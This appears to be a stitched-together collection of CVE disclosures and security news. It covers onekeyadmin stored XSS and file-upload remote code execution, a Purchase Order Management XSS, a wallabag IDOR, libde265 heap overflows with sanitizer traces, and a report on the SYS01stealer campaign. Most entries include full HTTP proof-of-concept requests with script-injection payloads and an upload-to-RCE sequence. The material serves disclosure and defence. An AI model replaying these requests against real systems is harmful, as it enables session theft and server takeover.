onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Administrator module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    url  
    http://192.168.3.129:8091/admin1#admin/index

poc POST /admin1/admin/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 224 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/admin/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","cover":"","account":"test<img src=1 onerror=alert("xss");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login\_count":"","group\_id":1,"password":"aa@xxxqq.com","status":1,"create\_time":"","theme":"template"}  

then you can view xss in url  
http://192.168.3.129:8091/admin1#admin/index

CVE-2023-26953: Background administrator management - Adding an administrator has a storage xss vulnerability · Issue #8 · keheying/onekeyadmin

Cybersecurity researchers have discovered a new information stealer dubbed SYS01stealer targeting critical government infrastructure employees, manufacturing companies, and other sectors.
"The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure

Data Safety / Cyber Threat

Cybersecurity researchers have discovered a new information stealer dubbed **SYS01stealer** targeting critical government infrastructure employees, manufacturing companies, and other sectors.

"The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure victims into downloading a malicious file," Morphisec said in a report shared with The Hacker News.

"The attack is designed to steal sensitive information, including login data, cookies, and Facebook ad and business account information."

The Israeli cybersecurity company said the campaign was initially tied to a financially motivated cybercriminal operation dubbed Ducktail by Zscaler.

However, WithSecure, which first documented the Ducktail activity cluster in July 2022, said the two intrusion sets are different from one another, indicating how the threat actors managed to confuse attribution efforts and evade detection.

The attack chain, per Morphisec, commences when a victim is successfully lured into clicking on a URL from a fake Facebook profile or advertisement to download a ZIP archive that purports to be cracked software or adult-themed content.

Opening the ZIP file launches a based loader – typically a legitimate C# application – that's vulnerable to DLL side-loading, thereby making it possible to load a malicious dynamic link library (DLL) file alongside the app.

Some of the applications abused to side-load the rogue DLL are Western Digital's WDSyncService.exe and Garmin's ElevatedInstaller.exe. In some instances, the side-loaded DLL acts as a means to deploy Python and Rust-based intermediate executables.

Irrespective of the approach employed, all roads lead to the delivery of an installer that drops and executes the PHP-based SYS01stealer malware.

The stealer is engineered to harvest Facebook cookies from Chromium-based web browsers (e.g., Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi), exfiltrate the victim's Facebook information to a remote server, and download and run arbitrary files.

Discover the Latest Malware Evasion Tactics and Prevention Strategies

Ready to bust the 9 most dangerous myths about file-based attacks? Join our upcoming webinar and become a hero in the fight against patient zero infections and zero-day security events!

RESERVE YOUR SEAT

It's also equipped to upload files from the infected host to the command-and-control (C2) server, run commands sent by the server, and update itself when a new version is available.

The development comes as Bitdefender revealed a similar stealer campaign known as S1deload that's designed to hijack users' Facebook and YouTube accounts and leverage the compromised systems to mine cryptocurrency.

"DLL side-loading is a highly effective technique for tricking Windows systems into loading malicious code," Morphisec said.

"When an application loads in memory and search order is not enforced, the application loads the malicious file instead of the legitimate one, allowing threat actors to hijack legitimate, trusted, and even signed applications to load and execute malicious payloads."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SYS01stealer: New Threat Using Facebook Ads to Target Critical Infrastructure Firms

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：

<img src=1 onerror=alert("xss");>  
url  
http://192.168.3.129:8091/admin1#userGroup/index  
  
poc  
POST /admin1/userGroup/save HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 114  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/userGroup/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"id":"","title":"test<img src=1 onerror=alert("xss");>","integral":0,"default":0,"status":1,"theme":"template"}  
  
then you can view xss in url  
http://192.168.3.129:8091/admin1#userGroup/index

CVE-2023-26954: Backstage member grouping - add storage xss vulnerability · Issue #11 · keheying/onekeyadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Admin Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    <img src=1 onerror=alert("xss");>  
    url  
    http://192.168.3.129:8091/admin1#adminGroup/index

\`POST /admin1/adminGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 95 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","title":"<img src=1 onerror=alert("xss");>","status":1,"role":\[\],"theme":"template"}\`  

then you can view xss in  
url:  
http://192.168.3.129:8091/admin1#adminGroup/index

CVE-2023-26955: Background role management - there is a storage xss vulnerability in adding roles · Issue #6 · keheying/onekeyadmin

An arbitrary file upload vulnerability in the component /admin1/config/update of onekeyadmin v1.3.9 allows attackers to execute arbitrary code via a crafted PHP file.

Vulnerability affects product:onekeyadmin  
Vulnerability affects version 1.3.9  
Vulnerability type:Remote code execution  
Vulnerability Details：  
Remote code execution caused by uploading arbitrary files in the background

Vulnerability location  
Vulnerability occurs in  
app\\admin\\controller\\File#upload Although there are restrictions on ext  
  
but we found  
The app\\admin\\controller\\Config#update method can update the limit  
  
  
Vulnerability recurrence  
Conditions Admin  
poc  
The first step is to update the configuration to allow uploading php files  
\`POST /admin1/config/update HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 398  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/config/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW\_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj\_KGa\_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt\_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG\_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3\_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs\_j-o0joMSDe7mdS\_3rTvyQ5errD\_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E\_1-zYB117H7tFTA\_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious filesPOST /admin1/file/upload HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 280  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP  
Accept: _/_  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/file/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="name"

templatex  
\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="file"; filename="1.php"  
Content-Type: text/php

\------WebKitFormBoundaryARP8fRC2kb4GP3oP--  
\`

CVE-2023-26949: Remote code execution caused by uploading arbitrary files in the background · Issue #1 · keheying/onekeyadmin

Purchase Order Management version 1.0 appears to suffer from a cross site scripting vulnerability due to printing errors with a malicious password payload.

    ## Title: Purchase Order Management-1.0 - XSS-Reflected - Information-gathering## Author: nu11secur1ty## Date: 03.06.2023## Vendor: https://www.sourcecodester.com/user/257130/activity## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `password` request parameter is copied into the HTMLdocument as plain text between tags. The payload uay4w<img src=aonerror=alert(1)>s4m6g was submitted in the password parameter. Thisinput was echoed unmodified in the application's response.STATUS: HIGH Vulnerability[+]Exploit:```POSTPOST /purchase_order/classes/Login.php?f=login HTTP/1.1Host: localhostAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5Origin: http://localhostX-Requested-With: XMLHttpRequestReferer: http://localhost/purchase_order/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected)## Proof and Exploit:[href](https://streamable.com/cgw8a4)## Time spend:00:15:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer athttps://packetstormsecurity.com/https://cve.mitre.org/index.html andhttps://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Purchase Order Management 1.0 Cross Site Scripting

Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.4.

**Description**

IDOR Vulnerability Allows add tag entry user other, allows adding tags to any user, since there is no user authentication. And not limiting the input causes the entry interface to break

**Proof of Concept**

Step 1. User A manages entry id 6

Step 2. User B manages entry id 7

Step 3. Login user A, add tag for this user entry

eg: demo user A

    POST /new-tag/6 HTTP/1.1
    Host: localhost
    Content-Length: 85
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/view/6
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
    Connection: close
    
    tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM
    

Step 4. Change the ID to 7, now you can add a tag to the user's entry

    POST /new-tag/7 HTTP/1.1
    Host: localhost
    Content-Length: 85
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/view/6
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
    Connection: close
    
    tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM
    

Step 5. Input value is not limited, then input character > 200 makes the interface broken

**Impact**

an attacker add tag by user other, interface broken

CVE-2023-0734: IDOR Vulnerability Allows add tag entry user other in wallabag

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 24 and March 3. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup (Feb. 24 - March 3)

Libde265 1.0.9 has a heap buffer overflow vulnerability in de265_image::set_SliceAddrRS(int, int, int)

**Description**

heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265\_image::set\_SliceAddrRS(int, int, int)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 653.bin
    

**ASAN**

    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    SPS error: TB > CB
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    =================================================================
    ==732766==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000007d8 at pc 0x7ff23d2ac50e bp 0x7ffce559d1f0 sp 0x7ffce559d1e0
    WRITE of size 2 at 0x6070000007d8 thread T0
        #0 0x7ff23d2ac50d in de265_image::set_SliceAddrRS(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1ec50d)
        #1 0x7ff23d29fb85 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfb85)
        #2 0x7ff23d2a8f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #3 0x7ff23d2aac3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #4 0x7ff23d1fde6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #5 0x7ff23d1fe673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #6 0x7ff23d1fd311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #7 0x7ff23d200345 in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140345)
        #8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #11 0x7ff23cb8ee3f in __libc_start_main_impl ../csu/libc-start.c:392
        #12 0x564bf4c027c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    0x6070000007d8 is located 0 bytes to the right of 72-byte region [0x607000000790,0x6070000007d8)
    allocated by thread T0 here:
        #0 0x7ff23d50d867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7ff23d2490b4 in MetaDataArray<CTB_info>::alloc(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1890b4)
        #2 0x7ff23d245381 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x185381)
        #3 0x7ff23d2279fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa)
        #4 0x7ff23d206b0d in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x146b0d)
        #5 0x7ff23d1fc970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970)
        #6 0x7ff23d1ffbe6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #7 0x7ff23d20024c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int)
    Shadow bytes around the buggy address:
      0x0c0e7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
      0x0c0e7fff80b0: 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 00 00
      0x0c0e7fff80c0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c0e7fff80d0: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
      0x0c0e7fff80e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa
    =>0x0c0e7fff80f0: fa fa 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa
      0x0c0e7fff8100: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00
      0x0c0e7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
      0x0c0e7fff8120: 00 00 00 00 04 fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==732766==ABORTING
    

**POC**

653.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47665: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int) · Issue #369 · strukturag/libde265

Libde265 1.0.9 is vulnerable to Buffer Overflow in ff_hevc_put_hevc_qpel_pixels_8_sse

**Description**

heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff\_hevc\_put\_hevc\_qpel\_pixels\_8\_sse(short\*, long, unsigned char const\*, long, int, int, short\*)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 653.bin
    

**ASAN**

    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: non-existing PPS referenced
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    =================================================================
    ==733371==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000d190 at pc 0x7f929c8bfbbc bp 0x7ffcdcf97080 sp 0x7ffcdcf97070
    READ of size 16 at 0x61b00000d190 thread T0
        #0 0x7f929c8bfbbb in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb)
        #1 0x7f929c7b249f in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a949f)
        #2 0x7f929c7b35a7 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa5a7)
        #3 0x7f929c7a4a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b)
        #4 0x7f929c7b1a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e)
        #5 0x7f929c7ef80b in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e680b)
        #6 0x7f929c7f1762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762)
        #7 0x7f929c7f1675 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8675)
        #8 0x7f929c7f1610 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8610)
